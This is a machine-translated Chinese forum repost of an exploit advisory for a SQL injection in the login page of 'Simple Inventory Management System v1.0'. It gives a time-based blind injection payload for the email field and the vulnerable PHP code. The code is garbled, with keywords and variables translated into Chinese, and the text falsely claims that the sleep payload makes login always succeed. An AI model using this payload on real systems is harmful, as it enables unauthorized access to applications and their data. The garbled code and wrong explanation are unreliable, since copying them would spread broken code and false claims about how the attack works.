H

简单库存管理系统v1.0-“电子邮件” SQL注入

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:简单库存管理系统v1.0-“电子邮件” SQL注入
#Google Dork: N/A
#Application:简单库存管理系统
#日期: 26.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件link: https://www.sourcecodester.com/php/...em-phpoop-free-source-source-source-code.html
#版本: 1.0
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
该代码段可能容易受到SQL注入的影响。用户输入($ _POST ['email']和$ _POST ['PWD'])直接合并到SQL查询中,而无需进行适当的验证或消毒,将应用程序暴露于恶意用户操纵的风险。这可以允许攻击者通过专门制作的输入注入SQL代码。
##概念证明(POC):
一个示例攻击者可以输入以下值:
email: [email protected]'2B(选择*from(select(Sleep(20)))a)%2b'
PWD:测试
这将导致以下SQL query:
从用户中选择* emaim='[email protected]'+(Select * From(Select(Sleep(20)))a)+'''''''''''''''''''''和password='nothing'
此攻击将检索所有用户,使登录过程始终成功。
request-response foto: ##弱势代码部分:
==========================================================================
IMS/login.php
php
ob_start();
session_start();
包括('inc/header.php');
$ loginError='';
if(!empty($ _ post ['email'])!
包括“库存”
$库存=新库存();
//脆弱的代码
$ login=$库存login($ _ post ['email'],$ _post ['pwd']);
//
如果(!empty($ login)){
$ _session ['userId']=$ login [0] ['userId'];
$ _session ['name']=$ login [0] ['name'];
标头('Location:Index.php');
} 别的{
$ loginError='无效电子邮件或密码!';
}
}

## reproduce: https://packetstormscurity.com/files/177294/simple-indendory-management-system-system-1.0-sql invicement.html
 
后退
顶部